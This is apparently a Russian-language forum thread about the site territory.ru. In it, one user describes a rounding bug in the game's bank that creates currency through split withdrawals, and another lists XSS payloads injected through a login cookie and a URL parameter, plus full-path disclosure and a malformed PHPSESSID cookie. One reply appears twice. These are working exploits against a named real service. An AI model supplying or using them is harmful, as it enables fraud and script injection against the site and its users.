Сам баг нашел. Заходите в банк. Там в счет. Кладете на счет 0.01 терр, потом снимаете со счета два раза по 0.005. В итоге у вас в кошельке оказывается на 0.01 терр больше. К сожалению, больше чем на 0.05 увеличить не удалось. Если кто что-нибуть придумает - пишите на мыло (pokop@yandex.ru)
Diablo, ну это ИМХО не совсем баг, а недоработка разработчиков... А если так ложить. то за трафф уйдёт много денег чтобы нкопить приличную сумму =) И там за это не забанят? )
Diablo, ну это ИМХО не совсем баг, а недоработка разработчиков... А если так ложить. то за трафф уйдёт много денег чтобы нкопить приличную сумму =) И там за это не забанят? )
Ну допустим xss:
1. В cookies loginc="><script>alert(/xss/)</script>
2. http://www.territory.ru/info/info/index.php?obj=cat&id=10&act="><script>alert(/xss/)</script>
Раскрытие полного пути:
http://www.territory.ru/info/info/
В cookies PHPSESSID='